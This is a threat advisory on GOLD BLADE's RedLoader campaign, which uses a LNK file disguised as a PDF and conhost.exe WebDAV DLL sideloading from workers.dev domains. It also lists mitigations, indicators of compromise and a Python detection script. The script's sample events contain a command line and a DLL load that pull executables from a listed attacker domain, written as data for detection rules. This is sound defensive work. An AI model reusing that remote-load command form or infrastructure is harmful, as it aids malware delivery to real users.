
GOLD BLADE remote DLL sideloading attack deploys RedLoader

Medium
Published: Thu Jul 31 2025 (07/31/2025, 15:01:10 UTC)
Source: AlienVault OTX General

Description

A new infection chain for GOLD BLADE's RedLoader malware has been identified, combining previously separate techniques. The attack begins with a malicious PDF link, leading to a ZIP archive containing a LNK file masquerading as a PDF. This file executes conhost.exe, which uses WebDAV to contact a CloudFlare domain and remotely sideload a malicious DLL. The infection progresses through two stages of RedLoader, ultimately establishing command and control communication. This updated method, observed in July 2025, demonstrates the threat actors' ability to adapt and bypass defenses by combining known techniques in novel ways.

AI-Powered Analysis

AI last updated: 07/31/2025, 15:33:34 UTC

Technical Analysis

The GOLD BLADE threat group has developed a novel infection chain to deploy their RedLoader malware, leveraging a remote DLL sideloading technique. The attack initiates with a malicious PDF link that entices the victim to download a ZIP archive. Inside this archive is a LNK (Windows shortcut) file disguised as a PDF document. When the victim executes this LNK file, it launches the legitimate Windows process conhost.exe. This process is then abused to perform a WebDAV request to a CloudFlare-hosted domain, from which it remotely sideloads a malicious DLL. DLL sideloading is a technique where a legitimate executable loads a malicious DLL, bypassing traditional security controls that might block direct execution of malware. The infection proceeds in two stages of RedLoader malware, ultimately establishing command and control (C2) communication channels to enable further malicious activities such as data exfiltration, persistence, or lateral movement. This attack chain combines multiple MITRE ATT&CK techniques: T1566 (Phishing), T1204 (User Execution), T1218 (Signed Binary Proxy Execution), T1140 (Deobfuscate/Decode Files or Information), T1055 (Process Injection), T1547.001 (Registry Run Keys/Startup Folder), and T1573 (Encrypted Channel). Observed in July 2025, this method demonstrates the adversary's ability to adapt and combine known techniques in novel ways to evade detection and bypass defenses. Indicators of compromise include specific file hashes and CloudFlare worker domains used for hosting malicious payloads. No CVE or patch is currently available, and no known exploits in the wild have been reported yet, but the sophistication and stealth of the attack chain pose a significant risk to targeted organizations.

Potential Impact

For European organizations, the GOLD BLADE RedLoader infection chain represents a medium to high risk due to its stealthy execution and multi-stage payload delivery. The use of legitimate Windows binaries (conhost.exe) for DLL sideloading complicates detection by traditional antivirus and endpoint detection and response (EDR) solutions. Successful compromise could lead to unauthorized access, data theft, espionage, or disruption of critical services. Given the use of phishing and social engineering to initiate the attack, organizations with large user bases or those that frequently handle PDF documents are particularly vulnerable. The establishment of encrypted C2 channels enables persistent and covert communication, increasing the difficulty of incident response and remediation. The attack's reliance on CloudFlare domains for payload hosting may complicate attribution and takedown efforts. European entities in sectors such as finance, government, healthcare, and critical infrastructure could face significant operational and reputational damage if targeted. Additionally, the evolving nature of the attack chain indicates that threat actors are actively refining their tactics, which may lead to broader adoption and increased attack frequency in the near future.

Mitigation Recommendations

1. Implement advanced email filtering and phishing detection solutions to block malicious PDF links and ZIP attachments before they reach end users.
2. Educate users on the risks of opening unexpected attachments, especially files that masquerade as PDFs but are actually LNK files.
3. Employ application whitelisting and restrict execution of LNK files from email or untrusted directories.
4. Monitor and restrict the use of conhost.exe and other signed Windows binaries for anomalous network activity, particularly WebDAV requests to unusual external domains.
5. Deploy endpoint detection and response (EDR) tools capable of detecting DLL sideloading and process injection techniques.
6. Use network monitoring to identify suspicious outbound connections to CloudFlare worker domains or other uncommon hosts.
7. Regularly audit and harden registry run keys and startup folders to prevent persistence mechanisms.
8. Maintain up-to-date threat intelligence feeds and indicators of compromise (IOCs) to enable rapid detection and response.
9. Apply network segmentation and least privilege principles to limit lateral movement if a system is compromised.
10. Conduct regular security awareness training focusing on social engineering and spear-phishing tactics.
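As an added example (not Sophos, AlienVault or this page's own code), the script below turns mitigation points 4, 6 and 8 into detection logic over Sysmon-style events: it flags conhost.exe taking a UNC/WebDAV argument, conhost.exe opening a network connection (especially to a workers.dev host), conhost.exe loading a DLL from a remote path, and any event carrying the hashes or domains listed in this pulse. The field names follow Sysmon's schema; the sample events, the `\\host@SSL\DavWWWRoot\` WebDAV path form and the rule names are assumptions constructed for the example, while the hashes and domains are the pulse's own indicators.

```python
"""Detection sketch for the conhost.exe / WebDAV sideloading chain above.

Added example, not Sophos or AlienVault code. It scores constructed,
Sysmon-style JSON-lines events (ID 1 process create, ID 3 network connect,
ID 7 image load) against what the advisory describes: conhost.exe reaching a
workers.dev host, a DLL loaded by conhost.exe from a remote UNC/WebDAV path,
and matches on the pulse's hash and domain indicators. Field names follow
Sysmon's schema; every event below is invented for the example.
"""
import json
import re

# Indicators copied from the pulse above; the only page-provided values here.
IOC_HASHES = {
    "d302836c7df9ce8ac68a06b53263e2c685971781a48ce56b3b5a579c5bba10cc",
    "f5203c7ac07087fd5029d83141982f0a5e78f169cdc4ab9fc097cc0e2981d926",
    "369acb06aac9492df4d174dbd31ebfb1e6e0c5f3",
}
IOC_DOMAINS = {
    "automatinghrservices.workers.dev",
    "quiet.msftlivecloudsrv.workers.dev",
    "live.airemoteplant.workers.dev",
}

# A UNC host prefix, including the WebDAV redirector form \\host@SSL@443\...
# (assumption: a WebDAV-backed load shows up in CommandLine/ImageLoaded this way).
UNC_RE = re.compile(r"\\\\[A-Za-z0-9._-]+(?:@SSL)?(?:@\d+)?\\", re.IGNORECASE)


def parse_hashes(field):
    """Turn Sysmon's 'SHA256=...,SHA1=...' string into a set of lowercase digests."""
    return {p.split("=", 1)[1].strip().lower() for p in field.split(",") if "=" in p}


def basename(path):
    """Last path component, case-folded, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of (rule, detail) pairs that fire for a single event."""
    hits = []
    eid = event.get("EventID")
    image = basename(event.get("Image", ""))
    host = event.get("DestinationHostname", "").lower()

    # Indicator matches apply to every event type.
    for digest in sorted(parse_hashes(event.get("Hashes", "")) & IOC_HASHES):
        hits.append(("ioc_hash", digest))
    if host in IOC_DOMAINS:
        hits.append(("ioc_domain", host))

    # Behavioural rules: conhost.exe is a console host and has no business
    # taking UNC arguments, opening sockets, or loading DLLs from a share.
    if image == "conhost.exe":
        if eid == 1 and UNC_RE.search(event.get("CommandLine", "")):
            hits.append(("conhost_unc_cmdline", event["CommandLine"]))
        if eid == 3 and host:
            hits.append(("conhost_network_connect", host))
            if host.endswith(".workers.dev"):
                hits.append(("conhost_workers_dev", host))
        if eid == 7 and UNC_RE.search(event.get("ImageLoaded", "")):
            hits.append(("conhost_remote_dll_load", event["ImageLoaded"]))
    return hits


def scan(lines):
    """Evaluate JSON-lines events and return [(RecordId, rule, detail), ...]."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        event = json.loads(line)
        for rule, detail in evaluate(event):
            findings.append((event.get("RecordId"), rule, detail))
    return findings


# Constructed sample log: records 1-3 mimic the described chain, 4 is a
# normal conhost.exe start, 5 is a browser touching a listed domain.
SAMPLE_EVENTS = r"""
{"RecordId": 1, "EventID": 1, "Image": "C:\\Windows\\System32\\conhost.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "conhost.exe \\\\automatinghrservices.workers.dev@SSL\\DavWWWRoot\\app.exe"}
{"RecordId": 2, "EventID": 3, "Image": "C:\\Windows\\System32\\conhost.exe", "DestinationHostname": "automatinghrservices.workers.dev", "DestinationPort": 443}
{"RecordId": 3, "EventID": 7, "Image": "C:\\Windows\\System32\\conhost.exe", "ImageLoaded": "\\\\automatinghrservices.workers.dev@SSL\\DavWWWRoot\\helper.dll", "Hashes": "SHA1=369acb06aac9492df4d174dbd31ebfb1e6e0c5f3,SHA256=d302836c7df9ce8ac68a06b53263e2c685971781a48ce56b3b5a579c5bba10cc"}
{"RecordId": 4, "EventID": 1, "Image": "C:\\Windows\\System32\\conhost.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "C:\\Windows\\system32\\conhost.exe 0x4"}
{"RecordId": 5, "EventID": 3, "Image": "C:\\Program Files\\Browser\\browser.exe", "DestinationHostname": "quiet.msftlivecloudsrv.workers.dev", "DestinationPort": 443}
"""

if __name__ == "__main__":
    for record_id, rule, detail in scan(SAMPLE_EVENTS.splitlines()):
        print(f"record {record_id}: {rule} -> {detail}")
```

The behavioural rules are deliberately independent of the listed indicators: record 4 (a cmd.exe-spawned console host with its normal handle argument) produces nothing, while the chain's conhost.exe events fire even when the hosting domain is rotated to one not yet in the feed. Hash and domain matches stay as a second, cheaper layer that catches the known samples.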


Technical Details

Author
AlienVault
Tlp
white
References
https://news.sophos.com/en-us/2025/07/29/gold-blade-remote-dll-sideloading-attack-deploys-redloader/
Adversary
GOLD BLADE
Pulse Id
688b85368e76ec4d637aee15
Threat Score
null

Indicators of Compromise

Hash
d302836c7df9ce8ac68a06b53263e2c685971781a48ce56b3b5a579c5bba10cc (SHA-256)
f5203c7ac07087fd5029d83141982f0a5e78f169cdc4ab9fc097cc0e2981d926 (SHA-256)
369acb06aac9492df4d174dbd31ebfb1e6e0c5f3 (SHA-1)

Domain
automatinghrservices.workers.dev
quiet.msftlivecloudsrv.workers.dev
live.airemoteplant.workers.dev

Threat ID: 688b891aad5a09ad00b9196e

Added to database: 7/31/2025, 3:17:46 PM

Last enriched: 7/31/2025, 3:33:34 PM

Last updated: 8/1/2025, 8:18:50 AM
